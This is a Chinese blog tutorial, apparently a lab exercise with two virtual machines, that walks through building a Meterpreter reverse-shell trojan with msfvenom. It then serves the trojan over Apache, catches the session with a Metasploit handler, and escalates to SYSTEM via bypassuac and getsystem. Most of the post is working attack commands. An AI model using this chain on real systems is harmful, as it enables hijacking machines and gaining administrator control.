使用kail中Metasploit获取Windows的权限并提权

已于 2022-07-20 10:18:57 修改
阅读量1.8k 收藏 15
点赞数 3
分类专栏: 笔记 文章标签: windows
于 2021-01-07 15:04:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/my3325/article/details/112309716
版权

0x01 环境搭建

虚拟机:kali
虚拟机:win7

0x02 实际操作

1.生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.157.128  lport=6666 -f exe >/root/桌面/evil.exe

在这里插入图片描述
2.移动木马至/var/www/html目录下

mv evil.exe /var/www/html

在这里插入图片描述
3.给木马文件evil.exe加上X权限

chmod a+x evil.exe

在这里插入图片描述
4.kali需要开启Apache2服务

service apache2 start

在这里插入图片描述

5.用windows打开kali得ip下载木马文件

在这里插入图片描述
6.提前查看postgresql运行状态

/etc/init.d/postgresql status

打开postgresql数据库

/etc/init.d/postgresql start

打开后才会出现绿点
在这里插入图片描述
7.开启MSF

msfconsole

在这里插入图片描述
8.先选择模块
8.1->msf5>

   use exploit/multi/handler

在这里插入图片描述
8.2->msf5 exploit(multi/handler) >

set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
8.3->msf5 exploit(multi/handler) >

set lhost 192.168.157.128

在这里插入图片描述
8.4->msf5 exploit(multi/handler) >

set lport 6666

在这里插入图片描述
8.5->msf5 exploit(multi/handler) >

show options

在这里插入图片描述
8.6msf5 exploit(multi/handler) >

run

在这里插入图片描述
9.使用win7打开下载得木马文件
在这里插入图片描述
10.然后就可以输入命令控制win7,这里我输入得查询ip地址
在这里插入图片描述
然后查询权限看一下,发现是最小权限
在这里插入图片描述
那么就来提下权
使用命令保存会话

background

继续使用命令切换模块

use exploit/windows/local/bypassuac

选择会话

set session 1

开始

run

在这里插入图片描述
查询用户权限

getuid

发现并没有更改为管理员权限,不着急,在输入一条命令

getsystem

然后在输入

getuid

OK,权限已提升
在这里插入图片描述

一宸、
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2020-kail linux 镜像下载 及kail工具使用教程
06-26
镜像文件下载kailkail工具使用从入门到入狱使用教程
Kali Liunx后渗透测试----对目标进行七种模块方式提权
王先生的蒋小姐的博客
06-09 2055
大家好,我是SuieKa。
使用MSF进行提权windows提权、linux提权、wesng使用
最新发布
liuhyusb的博客
03-12 502
​​MSF Windows提权​​​​反弹shell​​​​提权​​​​END推荐阅读​​​​MSF Linux提权​​​​反弹shell​​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
web安全渗透之钓鱼网站提权
kali_Ma的博客
11-12 4241
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
通过Kali利用serv-u漏洞获取win7系统管理员权限
weixin_60182338的博客
02-21 1688
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击。
VMware实现Windows7虚拟机、kali虚拟机和Windows10本机建立指定文件夹共享文件
weixin_73625393的博客
10-07 1788
(注意:第4步的路径,这里要设置成自己新建的文件夹路径)
Kali将用户权限永久提升为root
ianTok
10-02 4539
Kali
网络安全与网站安全及计算机安全:如何使用Kali Linux获取Windows计算机操作系统管理员权限【维持】
Kali与编程
12-14 5735
一、背景介绍 Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习! 二、资源装备 1.成功拿下的 Win7虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、安全演练 3.
kali】29 提权—— 利用漏洞提权
(∪.∪ )...zzz的博客
11-27 7871
这里写自定义目录标题一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限1. Ms011-080 对应补丁 Kb25927992. kali集成了exploit3. 查看.py4. 生成.exe5. 运行exe提权成功二、Win7 使用 Ms14-068 获取 域控制器的权限1.win2003搭建域控制器2. 修改win2003域控制器的用户权限三、利用 CVE-2012-0056 提升 linux 权限 一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限 1. Ms0
kali提升root权限
cuisidong1997的博客
11-27 1393
4、按 i 进入编辑模式,将想要提升权限的用户名后面的1000:1000改为0:0;5、按esc退出后,按 wq 或 shift+zz保存退出;6、reboot重启。
网络安全入门学习第三课
p36273的博客
05-05 848
【代码】网络安全入门学习第三课。
Kail Linux Rolling 子系统
08-19
无需虚拟机就可以在Windows上像打开普通应用程序一样运行的子系统,使用前请在【启用和关闭Windows功能】里面打开Linux子系统功能
网络安全kail使用
02-19
网络安全,kali系统自带软件的使用.Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。
Kail linux使用
04-26
Kail linux快速使用,.更换桌面(kde) 调出终端,输入下面三条命令的任意一条: (1) sudo apt-get install kubuntu-desktop (2) sudo apt-get install kde-standard(安装标准软件包) (3) sudo apt-get ...
Kail Linux在网络安全教学的应用探究.pdf
09-06
Kail Linux在网络安全教学的应用探究.pdf
网络安全工程师演示:原来黑客是这样获取你的计算机管理员权限的!【渗透】
Kali与编程
11-05 491
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
2019.9.20使用kali的metasploi获取windows权限
banshi6451的专栏
09-23 299
1 kali 基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是bt5r3(bractrack) 其Metasploit是一个综合利用工具,极大提高攻击者渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式:msfconsole,msf依赖与postgresql数据库,在使用msf之前要开启该数据库 step1:生成木马,msfvenom msfvenom...
木马程序攻击+利用Windows内核漏洞提权
m0_71745258的博客
01-22 2620
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
烂土豆提权复现
longwanlian的博客
10-16 163
值得注意的是,烂土豆方法只适用于符合特定条件的Windows版本和配置,例如使用旧版的Windows Server操作系统以及较早的Windows 10版本。根据微软的修补程序,烂土豆漏洞已经在最新版本的Windows被修复。本次为复现提权的实验,所以就对传递shell之间的细节忽略,拖拽shell上传目标靶机,在双击文件,笔记是一边复现一边写的。现在改用windows版本的msf倒是成功进入meterpreter后渗透模块。然后依旧没有成功,休息了一下,晚上看的时候就成功了,有时候还怪玄学的。
kail linux metasploit
04-03
Kali Linux is a popular Linux distribution that is widely used by security professionals and hackers for penetration testing and ethical hacking. It comes pre-installed with a wide range of tools and utilities that are useful for security testing, including Metasploit. Metasploit is an open-source framework that is used for developing and executing exploits against vulnerable targets. It provides a range of modules and payloads that can be used to exploit different types of vulnerabilities. Metasploit is also integrated with Kali Linux, making it easy to use and access. To use Metasploit in Kali Linux, you can open a terminal and type "msfconsole" to launch the Metasploit framework. From there, you can use various commands and modules to scan for vulnerabilities, exploit targets, and perform other security testing tasks. It is important to note that using Metasploit for unethical purposes, such as hacking without permission, is illegal and can result in serious legal consequences. It is important to use these tools responsibly and ethically.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值